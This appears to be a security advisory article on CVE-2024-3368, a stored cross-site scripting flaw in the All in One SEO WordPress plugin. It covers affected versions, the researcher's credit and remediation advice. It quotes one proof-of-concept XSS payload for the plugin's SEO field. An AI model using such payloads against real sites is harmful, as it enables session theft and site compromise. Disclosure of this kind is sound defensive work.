CVE-2024-3368 Vulnerability in All in One SEO Plugin Threatens Millions of WordPress Sites

A security vulnerability has been discovered in All in One SEO (AIOSEO), a widely used WordPress plugin with over 3 million active installations. This vulnerability, designated as CVE-2024-3368, enables attackers to inject malicious code into websites, potentially leading to unauthorized access, data theft, and website defacement.

The identified flaw, an authenticated stored cross-site scripting (XSS) vulnerability, affects all versions of AIOSEO up to and including version 4.6.0. This vulnerability arises from insufficient input sanitization and output escaping in the plugin’s meta description field. Consequently, authenticated users with Contributor-level access or higher can inject malicious web scripts into the SEO section of a page. These scripts execute whenever an unsuspecting user interacts with the compromised content.

Stored XSS vulnerabilities are particularly dangerous because they allow malicious code to be stored on the server and executed whenever the affected content is viewed. In this instance, attackers can inject harmful JavaScript code into posts, comments, or metadata fields. This code can perform unauthorized actions such as creating admin accounts, stealing data, or further propagating malware.

Security researcher Dmitrii Ignatyev from CleanTalk Inc has been credited with discovering this vulnerability.

A proof of concept (POC) for exploiting CVE-2024-3368 has been shared, illustrating how an attacker could inject malicious code into the SEO section of a new post. For example:

https://123.123″asdasd=”;alert(1);<img src=x onerror=alert(1)>

When this code is added to the SEO section, the malicious script executes, highlighting the ease with which this vulnerability can be exploited.

To protect against this vulnerability, WordPress site owners must update their AIOSEO plugin to the latest patched version immediately. Additionally, adopting the following security practices can further enhance protection against XSS and similar threats:

• Conduct regular security audits to identify and mitigate vulnerabilities
• Implement robust access controls to limit user permissions
• Utilize web application firewalls (WAFs) to detect and block malicious activities